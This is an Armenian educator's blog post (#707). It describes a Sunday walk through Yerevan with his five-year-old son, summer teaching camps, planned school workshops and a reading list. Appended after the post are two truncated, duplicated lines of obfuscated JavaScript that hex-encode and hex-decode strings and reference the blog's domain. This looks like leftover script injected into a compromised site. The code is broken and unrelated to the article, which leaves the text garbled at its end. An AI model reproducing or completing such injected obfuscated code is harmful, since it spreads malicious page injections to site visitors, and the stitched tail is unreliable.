— Պա՛պ, արի հեր ու տղա գնանք քայլենք… իսկ մայրիկը թող գնա խանութներով… Ես գիտեմ՝ ինքը ուզում ա։ Տեսնենք՝ ով շուտ տուն կգա…
Այսպես գործածելով «հեր ու տղա»-ն Դավիթն ընդարձակում է մայրենիի սահմանները, ավելի ինքնուրույն-նախաձեռնող դառնում… Շորերը հանեց-հագավ, ողջ ճանապարհին՝ վերգետնյայով Խանջյանի, Օղակաձև այգով, Զորավար Անդրանիկ, Գարեգին Նժդեհ մետրոյի կայարաններով «Շողակաթ» TV-ի հարևանությամբ Շենգավիթի կենտրոնական այգին, իր ետուառաջով ինքնուրույն, խելացի, հասուն՝ տոն պարգևեց ինձ հինգ տարեկանի դպրոցից շարունակ խոսող հոր տղեն… Սրան պարտեզում չես պահի…
Դպրոց պարտեզի փոքրիկ լողորդները:
Լուսանկարները` Տաթև Համբարյանի:
— Փոքրերը ոնց որ բիզոններ ու եղնիկներ լինեն, ես էլ առյուծի պես հոշոտում եմ իրենց…,- պատասխանում է իմ հարցին՝ ինչու, ինչպես է եղել, որ նեղում է իր սիրելի Ալեքսին՝ մեր Արևիկ Բաբայանի տղային, ում մասին Արմինե մայրիկը կարող է ժամերով հիացմունքով պատմել… Դե, Ալեքսն էլ բիզոնի նման է իրեն պահել, պաշտպանվել-հարձակվել է այս առյուծի վրա ու քերծել դեմքը…
Ճանապարհին նոր թիակներով փչովի նավով հեր ու տղա պտույտ ենք տալիս Օղակաձևի մաքրված-բադիկներով ավազանով, թութ ու բալ ուտում այգու հարևան տների ծառերից, ուսումնասիրում Շենգավիթի այգու հարևան տարածքները… Թիվ 146 մանկապարտեզը՝ դասական խորհրդային ժառանգությամբ ոգևորում է… որքա՜ն ասֆալտ-եզրաքար, անտեր, անխնամ տարածք… մոռացված բետոնե լողավազան… Մի ամսով պատանիների աշխատանքի ջոկատով մտնեի՜ այս տարածքը…
— Լավ չէ այսպես, պա՛պ…
— Պա՛պ, դու ուզում եմ, որ սրանք էլ մեր պարտեզի նման ես կառուցե՞մ…
— Պա՛պ, տես, ես ոնց եմ մագլցում, առյուծի պես,- ճանկերով պատերից կառչելով՝ սայլակի թեքահարթակներով է բարձրանում առյուծ տղեն… Ես համարյա չեմ գործածում՝ մի արա, կընկնես, էդ քո խելքի բանը չի, չես կարող… Ախր, ես որտեղի՞ց գիտեմ, չէ՞ որ իմ աչքի առաջ, փորձելով, զորելով կարողանում է…
— Մեծանում եմ, պա՛պ, հինգ տարեկան եմ…
Հիմնական դպրոցի սովորողների ծիրանանուշը, դասավանդողների հեծանվային ստուգարքը:
Լուսանկարները՝ Հասմիկ Պողոսյանի:
Հեր ու տղա, իհարկե, շուտ տուն մտանք, Արմինեն մի վայելքի մեջ է, որ ես չեմ ընկալում՝ ժամերով, խանութից խանութ… Եվ այսքան ուրախ… Շահեկան վիճակում ենք, այնքան, որ հեր ու տղա տունն ենք մաքրում, կարգի բերում, իսկ Դավիթն էլ որոշում է ինքնուրույն հանվի ու մտնի լողարանի ավազանը. մորից ամաչի, հորից ի՞նչ ու ինչո՞ւ թաքցնի… Այսպիսի, ջանքի պարգև կիրակի, Արարչի կողմից մեզ պատվիրած… Ո՞վ է ասել-փոխանցել՝ ես երբեք այդքան զբաղված չեմ լինում, որքան պարապ ժամանակ… Պարապը-արձակուրդը, կիրակին, հոր ու տղու թափառումը… հոմանիշներ են…
Հիմա ինձ զբաղեցնում են ուսուցման ճամբարային կազմակերպումը, ճամփորդությամբ ուսուցումը, ուսումնական ամառային մյուս նախագծերը… Մանկավարժության ճամբարը ընթացքի մեջ է… Ես համարյա բոլոր ուսուցիչների բլոգներով եմ անցնում իրիկունը ուշ, երբ Դավիթն արդեն քնած է (ես հաճախ եմ տարբեր ժամերին մոտենում քնած Դավթին)… Ինչո՞ւ՝ հարցնում եմ, այսքա՜ն, մեղմ ձևակերպում եմ գտնում, անփույթ, հերթապահ… Ուզեցի գտնել մեկ-երկու անհատական պլան, որ արտացոլի իմ սուրհանդակը, ճամբարային օրապատումները, ճամբարի առաջին օրվա ծրագիրն ու… Ինչո՞ւ, ընկերներ, տեքստ չեք կարդում, չեք մասնակցում ճամբարային ուսուցմանը կարևոր այս փուլում… Ավագ դպրոցի մուտքի ճամբարի պատրաստության այս շաբաթում հնարավոր կլինի՞ մանկավարժության ճամբարի և Միջին դպրոցի մուտքի ճամբարի ողջ փորձով գործել…
Ճարտարագիտության և շինարարության համալսարանի խումբը գեոդեզիայի պրակտիկան սկսեց կրթական պարտեզում:
Լուսանկարները՝ Արմինե Թոփչյանի:
Մինասյան Ալիկի հետ մանրամասն խոսեցինք «Ժայռում» նախատեսված պատանեկան և ուսուցչական ճամբարների պատրաստությունից… կազմակերպումից… Ճամփորդությամբ ուսուցումը ենթադրում է յուրաքանչյուր մանկավարժական աշխատողի դաշտային-արշավային կյանքի կազմակերպման հմտություններ, այդ թվում՝ նաև լողալու, ջրում պատանու, երեխայի կողքին լինելու, արշավ տանելու… Կրտսեր դպրոցների 1-3-րդ դասարանցիների, երկարօրյա, 4-7-րդ դասարանցիների հետ այս օրերին կնքվում են լողի, հեծանվի, վազքի լրացուցիչ ուսուցման պայմանագրեր… Մանկավարժական աշխատողը ներառված է սովորողի իրական ուսումնական կյանքում, նրա ուսումնական նոր աշխատանքի կազմակերպիչն է. սա նոր խոսակցություն չէ, նոր է կազմակերպումը, ու ես վճռական եմ տրամադրված…
Արհեստանոց-արվեստանոց-լաբորատորիաների կրթահամալիրային ցանցը 2016-ում ընդարձակվում է… Ստեղծական կարողությունների զարգացման հանրակրթութուն. հեղինակային կրթության իմաստը ուրիշ ի՞նչ կերպ… Գեղարվեստում գործարկվում է Կարինե Մացակյանի դիզայնի-նախագծման արվեստանոցը, Մայր դպրոցում՝ տեխնոլոգիա-ատաղձագործության (փայտամշակման) նոր ուսումնական արհեստանոցը՝ ընդարձակ, բազմաճյուղ… Քիչ մնաց, կտեսնեք 2016-ի այս, թվով 7-րդ հրաշալիքը մեր: Կբավարարե՞ն 2016-ի դրամական միջոցները իմ վերջին յոթ գրում՝ սկսած 701-ից ու ավարտած ահա 707-րդով, սիրով ներկայացված այս կառուցվող, ընթացքի մեջ հրաշալիքները օր առաջ, 2016-ին ավարտելու, գործարկելու համար: Իհարկե, ոչ, բայց հետևելով Օստապ Բենդերին, փողն ի՞նչ, գաղափարն է կարևոր, մնում է գաղափարով, նախաձեռնությամբ համակված սեբաստացիների տարատարիք, մեծացող-տարածվող բանակ… Իմ 690-րդ գրին ես հղում եմ անում՝ սկսենք, նորեն սկսենք:
Մանկավարժության ճամբարի մի ջոկատը սեմինարն սկսեց ամենակրթական կասկադով:
Լուսանկարները՝ Անահիտ Մելքոնյանի:
Մեռած ծառեր, որոնք վերածվել են արվեստի… Ամեն օր, իմ ճամփին հեծանվային ես տեսնում եմ ապրող ծառեր, որ արվեստ են խաղում, Երևանյան լճի հանդիպակաց մայթի ողջ երկայնքով ինձ ողջունում շարք կազմած… Հետապնդեք ինձ, սեբաստացի հեծանվորդ ուսուցիչներ, ֆոտոխցիկով, որ ցույց տամ, պահել եմ ձեզ համար… Իսկ Շորժայից մինչև Սևանի «Ժայռ», ես պահել եմ ձեզ համար արվեստի գործերի շարք՝ քարափների տեսքով, ու մի ճամփի բլուր, որի վրա, դիմացդ Սևանը կապուտակ, դու ոչինչ չես ուզում. հասել ես…
Ընթերցարանը հատուկ եմ ընտրել, խնամքով, մանկավարժության ճամբարի մասնակցի համար։
- 10 կանոն, որոնց պետք է հետևի յուրաքանչյուր իմաստուն կին
- Ինչպես արագ նիհարել
- Հովանալու և շոգից փրկվելու 6 ստուգված մեթոդ
- Խաղողն ու ծիրանը շոգին պաշտպանում են սիրտը
- Բժիշկները պատմել են երկարատև քնի վնասի մասին
- Չորս մթերք, որոնք մարդուն դարձնում են հանճար
- Apple-ը էներգիա կարտադրի աղբից
- Օրական 15 րոպե լիցքային վարժությունները մահը նվազեցնում են 22%-ով
- Մշակված է խաղ փոքր երեխաների համար, որը բարձրացնում է նրանց մաթեմատիկական ընդունակությունը
Ֆոտոխմբագիր՝ Սոֆյա Այվազյան
#707
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ashotbleyan.mskh.am"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ashotbleyan.mskh.am"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e